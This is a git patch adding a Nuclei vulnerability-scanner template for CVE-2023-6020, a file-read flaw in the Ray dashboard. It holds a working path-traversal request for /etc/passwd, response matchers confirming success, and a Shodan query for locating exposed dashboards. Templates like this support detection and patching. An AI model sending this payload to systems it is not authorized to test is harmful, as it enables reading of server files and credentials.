From 20b7beb4897a8f3153843e72dd7fc6451b39f67a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 5 Dec 2023 21:45:41 +0530 Subject: [PATCH] Create CVE-2023-6020.yaml --- http/cves/2023/CVE-2023-6020.yaml | 47 +++++++++++++++++++++++++++++++ 1 file changed, 47 insertions(+) create mode 100644 http/cves/2023/CVE-2023-6020.yaml diff --git a/http/cves/2023/CVE-2023-6020.yaml b/http/cves/2023/CVE-2023-6020.yaml new file mode 100644 index 0000000000..a1802b8a38 --- /dev/null +++ b/http/cves/2023/CVE-2023-6020.yaml @@ -0,0 +1,47 @@ +id: CVE-2023-6020 + +info: + name: Ray Static File - Local File Inclusion + author: byt3bl33d3r + severity: high + description: | + LFI in Ray's /static/ directory allows attackers to read any file on the server without authentication. + reference: + - https://huntr.com/bounties/83dd8619-6dc3-4c98-8f1b-e620fedcd1f6/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-6020 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2023-6020 + cwe-id: CWE-862,CWE-598 + epss-score: 0.00084 + epss-percentile: 0.34955 + cpe: cpe:2.3:a:lfprojects:mlflow:-:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + shodan-query: html:"Ray Dashboard" + tags: cve,cve2023,lfi,ray,oos + +http: + - method: GET + path: + - "{{BaseURL}}/static/js/../../../../../../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: word + part: header + words: + - "application/octet-stream" + - "aiohttp" + condition: and + + - type: status + status: + - 200